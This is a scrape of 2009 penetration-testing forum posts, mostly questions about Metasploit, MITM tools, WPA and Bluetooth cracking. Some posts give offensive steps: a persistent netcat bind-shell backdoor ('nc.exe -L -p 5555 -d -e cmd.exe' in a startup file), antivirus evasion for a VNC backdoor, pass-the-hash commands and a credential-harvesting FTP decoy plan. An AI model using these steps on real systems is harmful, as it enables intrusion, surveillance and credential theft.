Revision: 7131
Node Kind: directory
Schedule: normal
Last Changed Author: kris
Last Changed Rev: 7131
Last Changed Date: 2009-10-06 11:09:05 +0530 (Tue, 06 Oct 2009)
-
-
12:07
»
remote-exploit
I'm part of a student group that is attempting to get together a hack - defend game [probably a CTF type].
What I was looking for was if anyone was aware of a "Hacking Experience Quiz," or basically "What do you know?". I've done some Google searches and found very little, mostly "Hacking Challenges" [like hackthissite]. Our goal is to rank the members, so that we could offer tutorials by level.
I was also hoping that someone might have some experience with this. There are a lot of beginners and we would like to work our way up in difficulty. Do you have any advice on how to design the actually Challenges or if you are aware of any OS Distributions designed for that? I did find de-ice.net, but none of the links seem to be working.
I was thinking that the easiest way to do this is like rootthisbox.org rather than the way DefCon does it. In other words, have a file in a web-accessible folder, that is polled every five minutes and the team name in that file will receive x amount of points. Any other ideas about points?
Thanks guys for your help!!
-
-
2:47
»
remote-exploit
im on a network where all the traffic passes thru a squid proxy out to the network , i.e all out going traffic is thru port 3128 and the proxy is setup in such a way that no interlan communication is allowed.. so if one manages to deploy a binary payload of reverse tcp meterpreter the connection still wont be established since the proxy will kill the connection (i know this can be easily over come by enable the option of bypassing proxy for computer on same network but i dont have physical access to any of the computer),, so is there a way that meterpreter will bypass the proxy directly communication with the exploit handler?
-
-
20:54
»
remote-exploit
hii alll,,,
i got a questions here,,
did metasploit works in wireless network, i have tried to exploit one of my laptop that connected to wireless with windows xp installed on, and the i tried to exploit it with metesploit, i use ms08 exploit and i use meterpreter payload, but when i type exploit, metasploit seem couldnt exploit that system, it says the exploit was succefull but no session was created, did this the problem with wrong payload, or did the metasploit cannot be used in wireless network,,,
-
11:02
»
remote-exploit
Hi there,
I am learning about penetration testing, i have set up a Windows Server 2003 R2 Enterprise virtual machine.
It is relatively unpatched (vulnerable to ms08-067), no antivirus, windows firewall, After a Nessus scan a few of these vulnerabilities were shown.
When i use fast-track.py to exploit this vulnerability (ms08-067) i immediately get a shell running as system. However, i would like to use meterpreter for all of its features than a simple netcat of cmd.exe and fasttrack provides no way to change the payload.
So i try to exploit the machine using Metasploit, using the appropriate settings, Using exploit: ms08_067_netapi, windows/meterpreter/bind_tcp OR reverse_tcp OR a simple bind shell (to test) however i get the following error:
Code:
Exploit target:
Id Name
-- ----
9 Windows 2003 SP2 English (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)[*] Exploit completed, but no session was created.
Code:
Exploit target:
Id Name
-- ----
9 Windows 2003 SP2 English (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Exploit completed, but no session was created.
When setting the target manually the exploit also fails as it cannot determine the language pack!
Please could somebody shed some light on this issue? is the metasploit exploit working correctly on R2? (Latest SVN)
Thanks,
Joe
-
8:23
»
remote-exploit
Has anyone else noticed nmap doing false positives on port 21?
Just about every ip I scanned during my current job came up positive, but when I try to connect with an ftp client it's closed. Also OpenVas doesn't show it as open(although scanline from foundstone does).
Anyone know if this is just me or not?
Thanks
-
5:44
»
remote-exploit
Hello! Well my question is primarly as the topic says, why is there a "low" successrate on the SMB2 exploit (the metasploit version)? More specific in technical terms... Or is it unknown why?
I find it wierd since i have tried this exploit on two stations, one vista and one windows 7 and the results are different everytime... Just keep spamming and it will eventually work... If the box is unlucky...
-
-
17:08
»
remote-exploit
Dear
i need your help, i would like to make audit in our Network, and i wish to do pen test on some server windows and unix or linux OS and other equipements like Cisco Router and switch
could you please help what i can do that ? i know i can use Nmap for test port and nessus for unix but is there any other tools like LANGFI ? what is the free tool can help me to do auditing for our Cisco swhtch and router ?
and anyone can let me know how i can use metsploit for get system linux or hpunix without root user ?
Best Regard & thank you advance
-
-
5:04
»
remote-exploit
im on a network which has all traffic forwarded to the internet via a squid proxy i.e port 3128 i tried running sslstrip but it fails raising several errors.. so has anyone every got sslstrip to work under such network topology?
im guessing ssl strip only works on port 80 or 443? plz let me know if any ones got it working
-
-
18:00
»
remote-exploit
I am pen testing on my laptop to my pc (Windows XP SP2). I watched and read some tutorials on how to penetrate a XP box and followed the directions. I even opened the required ports/disabled firewall/forwarded ports/AV however when running autopwn no sessions are connected ;/
I am starting to think its not the remote box (my XP) but however the configuration on my laptop which has bt4 installed.. could it be?? i updated fasttrack n etc as well. I could be wrong but then im the noob here asking for help =O
note: on boot the dhcp3 server doesn't start >_<.. just thought i'd mention it in case it might be a problem..
-
-
8:32
»
remote-exploit
***EDITED***I read through a lot of metasploit tuts/concepts so I have pretty good idea for what I'm going for.
I'm trying to do two different things.
1. Gain remote access to a Vista pc in the same LAN as me.
2. Gain access to my friends Server (Running Server 2003) over a WAN.
Can Metasploit help me gain access to both these machines?
-
-
1:13
»
remote-exploit
Hey guys,
I tried pulling a exploit off milw0rm - Mozilla Firefox 3.5 Heap Spray Exploit to be exact - and I've gone ahead and set it up running. It tells me to have someone connect on port 80 but when I do, nothing happens. Firefox just says "Failed to establish a connection".
I've checked nmap and the port does open so it appears the exploit is trying to do its job. Tcpdump also shows there is an attempt of a connection of some sort.
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit <-- Link to the exploit im trying to use.
Results from konsole:
Listening on port 80.
Have someone connect to you.
Type <control>-c to exit..
Any idea whats not working here? If you need any more info to be able to help me - let me know and Ill be glad to share.
Thanks in advance,
Wolf
-
-
12:48
»
remote-exploit
Hello people.
I was wondering if some of you have some literature/links to share about evading firewalls, excluding techniques as reverse shells where social engineering is needed as the user have to execute the binary that establish the connection.
Thank you!
-
-
23:36
»
remote-exploit
I am working on a project to crack fixed pins on a bluetooth device. I was wondering if it is possible to enter more than 1 pin per second? Does anyone have any info on the delay of the pairing proccess? Thanks.
-
-
3:05
»
remote-exploit
This module exploits a stack overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account) This exploit module was written by Kingcope (kcope2@googlemail.com) and hdm (hdm@metasploit.com)
Home Page:
4xsecurityteam(dot)blogspot(dot)com
4xunderground(dot)blogspot(dot)com
vimeo.com/channels/4xsecurityteam
thak&$$$$$$$$$$$$Mzer0$$$$$$$$$$$$$$$$$$$
-
-
4:52
»
remote-exploit
Hi,Frnd
This exploits a buffer overflow in the LDAP service that is part of the SIDVault product.
Home Page:
4xsecurityteam(dot)blogspot(dot)com
4xunderground(dot)blogspot(dot)com
vimeo.com/channels/4xsecurityteam
Thanks
References:
milw0rm(dot)com/exploits/9586
milw0rm(dot)com/exploits/9592
milw0rm(dot)com/exploits/9596
-
2:38
»
remote-exploit
A quick method to create a custom wordlist for your target. Enjoy.
PaulDotCom: Archives
-
-
20:00
»
remote-exploit
Is there a way that after you gain access to a box to change its language?
Say you have TS access, and it's in French or Chinese or something. Can you run a command to change it to English?
I guess I could just build it in my lab, but figured someone here probably knows a trick.
Thanks in advance.
Edit:
Someone will probably ask. Question is for Linux and Windows primarily, but if you know a trick for some other OS, please post it. Thanks.
-
-
9:24
»
remote-exploit
Consider this scenario,
there are two hosts in the lan, one is ftp server and it has some interesting data which can be gaind with the right ftp access, let say it's a well secured linux based os. The other is xp office box and the attacker gaind access and admin privileges on it remotely, controlling the host through the router that separate the lan and outher world.
Main idea ,from attacker point of view is to install the 'attacker controlled honeypot' on the xp box that is going to imitate the FTP server on the first box.
So, if the attacker succeed in fooling the gateway to redirect all trafic intended for the victim (real FTP server box) to his pwnd xp box, the FTP users will end up connecting to the box pwnd by remote attacker and give their username and pass to 'attacker controlled honeypot'.
I'm trynig to make this setup in my virtual environment. There are few things i'm not familiar with, and i will appreciate some tips. The 'honeypot' that has to be planted on the xp box could be a small program like ,lets say netcat and then it's output could be redirected wherever i want, but the honeyput appearing screen should be like FTP server screen, so i need some kind of 'honeypot like' easy to set up small program, or something like msf modul (if somebody has write something like this).
The outher way that is probably the right way is to write a small program,
programing the winsock to act like ftp server ,store the data ,exit on storing pass buffer and stop the arp spoofing process, so that ftp user will be disconected. And when he try to connect again he will be redirected to, i hope to real FTP server.
I must say that for now i don't have so much time for going into winsock programing, for now.
So if there is some kind of honeypot right for this purpose...
I'm hope that my scenario have some sence 'couse if i had time for going through it i will put it in my final exam on my university.
Every opinion on this is wellcome.
-
4:39
»
remote-exploit
Hi, I'm new to the forums and I figured out how to crack the pin when the devices are pairing but is it possible to crack a fixed pin? I need some advice on building a brute force pin cracker. I have done some research and found a pin manager program called bluez pin, the script for the program is at t2-projectDOTorg, I want to know if there is any way of implementing the brute force pin cracker into this program. I also found a program called Brutus and was wondering if anyone can help me configure it to work with bluetooth. Thanks.
-
-
0:17
»
remote-exploit
What do you use for your pen tests? Why?
I use:
G++, I use C/C++ as my scripting language :p
KlocWork, Code Auditing, fast, awesome, need I say more?
IDA Pro, For when automated scanning and fuzzing fail.
NASM, Assembler, Nice Syntax, great for rapidly making Shellcode
Firefox, With all the addons, it serves as a great preliminary tool for attacking Web apps.
Nmap, The OS Scanning, oh and the fact that im to lazy to write my own :p
Nessus, scans alot, fast, way more than I can manually.
Maltego, Information gathering has never been easier, seriously
Wireshark, Some things I really dont wanna do in the terminal, sifling through 5000 packets is one of them.
BurpSuite, Web applications are fun sometimes.
Metasploit, meterpreter, end of.
Aircrack-ng, to lazy to rewrite this stuff.
Now for my personal tools:
InjecTi: A packet injector that i use in scripts that can ALMOST replace any tool imaginable, is modular as well.
Crackit: A modular Password cracker, only over tcp atm, but could be run over almost anything else. Uses keyword such as DEC, SEND,REC, ADD, CUT, TRY to control the flow of the program in a dynamic fashion.
Kat: A remake of netcat, with banner grabbing and other goodies buld in.
Snarfit: A modular data snarfer that you feed input into and it feeds out what you want, used for things such as parse large logs for IP's, and spitting the exif data out of hundreds of photos at once/
HarDoS: A Collection of DoS tools including ones to defeat syn cookies, DoS wireless connections, and use well known attacks such as the Smurf attack.
Cubbyhole: Two rootkits to rule them, one man to bind them. One for *dows and one for *nix.
-
-
12:17
»
remote-exploit
Has anybody had success in opening/viewing MTF files received after a successful exploitation of Veritas backup file download vulnerability using Metasploit? (Bugraq 14551). The files received are in the in 'MTF' (Microsoft Tape Format), which is supposed to be able to be extracted by the NTKBUp program. I am not getting this to work. I have also download an MTF reader for Linux from Tucows and this software cannot read the files either. Any ideas?
-
1:41
»
remote-exploit
Hi,
I am having trouble configuring samba to work with a pass the hash attack. Was wondering if anyone would be able to lead me in the right direction with this one?
I have done (in order):
downloaded samba 3.0.22
patched the appropriate files
configured samba (--with-smbmount)
make + make install
add the hash to the SMBHASH env variable with export
When I do the following:
./smbmount //target/drive /mnt/target -o username=target-user
I receive this error:
params.c:OpenConfFile() - Unable to open configuration file "/usr/local/samba/lib/smb.conf":
No such file or directory
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Password:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...
16526: session setup failed: ERRDOS - ERRnoaccess (Access denied.)
SMB connection failed
This is interesting because the smb.conf file is in /etc/samba and not in /usr/.../samba/. So I was wondering if anyone knew how to redirect samba to look in /etc/samba. I don't know if it matters but it should be noted that /etc/smb.conf existed before I installed samba 3.0.22 (was on default install of bt4).
Also, when I create a mount point (mkdir /mnt/target) and try and mount it (mount /mnt/target) I receive the following error:
mount: can't find /mnt/target/ in /etc/fstab or /etc/mtab
Any ideas on this would be appreciated.
Thanks.
-
-
22:22
»
remote-exploit
Was wondering if anyone knows if there is exploit code in the wild for ms09-039 (CVE-2009-1923; CVE-2009-1924 )?
I have checked Packetstorm, milw0rm, SecWatch, and SecuriTeam -- without luck.
I should also ask while I'm here if anyone knows of any other good exploit resources?
-
-
22:51
»
remote-exploit
Hi
Using Metasploit on the LAN works like a dream:D
For example has anyone used it over a WAN , the attacker using a private range ip (NAT) the attacked system using a public ip.
Lets say to open a command prompt on the remote / attacked system ?
Can someone share some knowledge on this subject
Thank you:cool:
-
14:23
»
remote-exploit
Gentlemen,
I am working in a remote supervision procedure. Basically, the steps are:
1.- Pop a box using meterpreter
2.- Upload a packed VNC backdoor, modify registry accordingly
3.- Sit and watch the remote desktop
(Meterpreter built-in VNC seems to run at very slow frame rates, however this is a LAN exercise)
I do know how to get the shell, prepare the backdoor, set registry changes, create a firewall rule to allow the executable ...
Now, I want it to be undetectable from AV's. Again, I know how to do this for a particular AV by hex modifying the program, as per
Defeating Virus Signatures
or by just compressing it.
Do any of you know a (simpler) method to hide an executable from most AV's in one shot?
Killing the AV is not an option here.
For the suspicious minds, I own a security company and I was born in the 60s. What I intend here is to show some clients (non technical profiles) why they should invest in security by using a real world example.
That's why I don't want to go through the tedious hiding process for each and every AV they may use.
Thanks.
-
-
11:17
»
remote-exploit
I manage to do my first backdoor.
Lab: Attacker: dell laptop inspirion 1525 usb Backtrack4 prefinal
Victim: virtual box Windows xp sp2 home edition under linux ubuntu 9.04 .
I think these steps are easy so anyone who start working wit Bt as i start few months ago can try this to see in general how persistent backdoor works.
First i run metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.
After i get active session first i disable firewall with Carlos Perez script.
Then i uplod file nc.exe in C:/ (or any directory you want) and batch file with name test.bat which i previously made in notepad runed in wine which i upload in startup folder of victim machine.
Test.bat had this in file: start C:nc.exe -L -p 5555 -d -e cmd.exe.
After i do this and reboot machine my backdoor always listen on port 5555 (or you can put someother port) and everytime machine start you can see i one second black cmd screen which start listener on port 5555.
Then just type on Attack machine: nc (ip of target) 5555 and you will get reverse shell.
Its far from ideal backdoor and has many drawbacks but i think its nice way to start to see how backdoors work in general.
If someone has any sugesstions (i didnt manage to bypass firewall without disable it with ruby script first) or something like that or someone how will try this can ask me here and i will help him to make same thing as me?
-
-
11:36
»
remote-exploit
is there a way to crack a login.php form, i have successfully cracked a login.asp with simple sql injection, but this login.php is giving me trouble, a little push in the right direction would be helpful
-
-
13:29
»
remote-exploit
I've been redirected and you are able to see the Thread right here:...[Oh, f***. Totally forgot about the rule]. What a literally STUPID rule to let users only post links after having reached 15 posts. That being said, let's continue.
MISSION: Let JTR pipe its live-generated 8-character passwords into Aircrack-ng while being able to use JTRs resume-from-previous-state function.
For further information on directly piping output of JTR into Aircrack, please refer to the following documentation entry: [ask me if you need the link].
Conclusions I've drawn so far: First of all, the documentation of JTR is a total mess. Seriously.
Secondly, it doesn't make much sense to set bruting mode to the full length from 8 to 63 characters. For the sake of analysis, 8 chars will do.
* In john.conf, incremental mode has to look somewhat like this:
Code: [Incremental:Alpha]
File = $JOHN/alpha.chr
[colour=red]
MinLen = 8
MaxLen = 8[/colour]
CharCount = 26 The corresponding command to launch the rocket will probably look like this (NOTE: The following command must be run in JTRs path):
Code: john --incremental:alpha --stdout | aircrack-ng -0 00:14:6C:7E:40:80 -w- *psk.cap Put in simple words: In the above code JTR uses all lowercase letters as input and pipes them into Aircrack-ng. Option -0 brings some colour into the world.
Even if you only have ONE network in your captured file specified (which should be the case since you are working on your own network, right?) Aircrack-ng asks for an ESSID (option -e/--essid) and/or BSSID (option -b/--bssid). With "-w-" (without quotes) Aircrack-ng knows that it gets its input from another program: JTR.
Further questions to the above:
* Let's take another look at john.conf: Is the CharCount still correct when changing MinLen to "8"?
* JTR seems to use its dictionaries in the cracking process.
(Therefore, the code needs to be changed so that JTR tries EVERY single combination possible with 8 characters without touching any dictionary.)
* JTR saves its progress by default, but how exactly is it possible to resume a stopped session in combination of Aircrack-ng?
If anyone of you knows an answer to the above questions: I'm all ears. Thanks for participating, guys.
-$p!c3-
-
-
10:02
»
remote-exploit
Hello!
This may be a very dumb question to ask, but I find it interesting.
And I'm sure that a lot of others that are new to this will to.
I haven't worked with metasploit a lot. So I decided to install a virtual Vista Sp1 machine and check it out and play around with meterpreter. Once it was done I installed Avg free, didn't install any updates. I started my virtual BT4, and got me thinking, now what?
I have to run an exploit to a vulnerability on the Vista, the only problem is that I don't know of any specifically, and that is a part of the Metasploit exploit arsenal.
My question straight out is, how do we make a vista machine (or xp for the sake of other users searching the forum for this) vulnerable as least time consuming as possible?
-
-
7:26
»
remote-exploit
Recently i try soundrecorder.rb script by Carlos Perez and it is really cool thing.
After remote keysniffer really nice thing.
My lab: on one computer Backtrack4 prefinal usb and another Windows xp sp3.
I run exploit windows/browser/winamp_playlist_unc old exploit for winamp 5.12 but i like it to launch this exploit and payload windows/meterpreter/reverse_tcp.
After sessions become active i first migrate fast to explorer.exe process.
Then run soundrecorder.rb script and talk on mic on victim computer and attacker computer recorded everything. Really nice also nice is that after time of recording is over script automatically delete uploaded files linco.exe and oggenc.exe.
Can someone else say something about this nice script and experience with it?
-
-
7:47
»
remote-exploit
This is my first post to this forum, so hello.
I am currently "pentesting" my website, trying to hack into it. Social engineering myself is cheating, as is social engineering my boss, so social engineering is out (except for social engineering the web hosting company, but that is something that I would like to avoid (I could "cheat" and make it very easy due to my knowledge as a web admin for the site. I will do it as a last resort, but I would rather learn something new)). If grabbing a banner using ncat fails to reveal service types, versions, and anything else, and nmap only gives a 90% secure guess on operating system type without reliable version information, and nothing on the version of the ftp,
[http,] smtp, etc. services running on various ports, but is still able to get the type of service running on a given open port, is there any other way for me to find out the versions my website/webhost is running?
Thanks to any responders in advance.
-
0:53
»
remote-exploit
Hi , I've been thinking for awhile of a situation were you are trying to access a network, and you connect a device to the telephone lines and act as a mitm.
In my area most people have adsl2 and use pppoa,or pppoe, ad you can get broadband pci cards, which you should beable to bridge. If i rember correctly wireshark has the abilty to read the packets.
Q1) Has anyone got a pci broadband card, and what does it allow you to do.
Q2) What type of attack vectors will it open up(same as lan or more)
Q3) with the authcation of ppp does that allow you to decode packets(looked on google but about from the make up, it does tell much about type of packets on the wire)
Q4) Would it allow injection, would you need it to authcate with you, and then you with the isp.
Q5) Can you use a network card rj45 if you connect the two phone wires(2 middle in this counrty(default) to 2 and 5 on a rj45 socket.
If its possable, some three clamps connected to the two wires should allow quick connect of data out of the network minus encryption traffic.
Would this be a powerfull attack, you don't need to guess DNS numbers , web traffic in clean. Down sides would proable be vpns.
Anyone thought or ideas
Cheers
-
-
15:15
»
remote-exploit
Hi,
[Sorry for my bad english ....]
I install FTP server over II6 and configure anonymous user with R/W permissions and I stop HTTP service.
I open Ftp connection to 192.168.1.100 anonymous mode and I try to write / copy file inside and it works.
So I think it's easy way put nc.exe on ftp server root.
I create connection as below:
Code: C:>echo OPEN 192.168.0.100 >> ftp.txt
echo OPEN 192.168.0.100 >> ftp.txt
C:>echo ....
........
.......
echo bye >> ftp.txt
....
C:>ftp -A -s:ftp.txt I use FTP.exe windows command because it support "-s" option.
This mean run ftp.exe and execute instructions inside ftp.txt.
I browse ftp directory from firefox and I find nc.exe on the directory.
Double click...
I can save nc.exe into my root but I can't run nc.exe or receive interactive shell.
It's right because FTP works in UDP mode port 20 and FTP is no-interactive program.
I try use Fast-Track in WEB GUI mode ./fast-track -g
I read official wiki and watch movies.(No movie about "Binary to Hex unfortunatly)
I'm interesting about "Binary to Hex Payload Generator".
I start fast-track in web gui mode localhost:4444.
Fast-Track guide localhost:44444/binaryconvert explains that payload size must be less than 64K.
I respect this infact nc.exe in about 59K.
I convert nc.exe in payload.exe.
By default it's saved on -->/pentest/exploit/fasstrack/payload.exe
Another point of the guide is "...and puts it into the right format to echo onto the operating system."
So I think the right method is exe to bat conversion
I convert wine exe2bat payload.exe in nc.txt.
I copy line code inside nc.txt.Code is in echo mode I suppose..
I open again ftp 192.168.1.100
From ftp shell I past nc.txt content.
I can't receive interactive shell .
I'm sure I miss something or I follow wrong way.
Thanks in advantage.
MALAM
-
10:03
»
remote-exploit
I'm testing using MITM against my dummy computer.
I get dsniff, arpspoof, fragrouter, and dnsspoof running but when I run webmitm it lets me create the certificate, but then if just gives me the error of
webmitm: bind: Address already in use
What am I doing wrong? I googled it like crazy but only a few pages showed up and none of them had any kind of a solution. Could it be because of anything that I already have running whether its part of the MITM attack or not (ie. firefox, or having mapped smb locations, pidgin)?
I've tried deleted the certificate and starting over. I also tried entering different infor into the certificate.
Any help would be appreciated. Thank you.
-
-
14:44
»
remote-exploit
Hey guys,
I think most of you are knowing the XSSShell Project
XSS Shell, backdooring the web....
I've searched a while but I was not able to find any project which brings XSSShell or something simillar to Linux. Any one of you knows a project which brings the power of XSSShell to apache, linux and backtrack?
m-1-k-3
-
-
2:55
»
remote-exploit
Hey guys,
has someone of you any practice in testing MS Silverlight Apps? Any links or some details could be very helpful.
thx
m-1-k-3
Good
Bad
Very Bad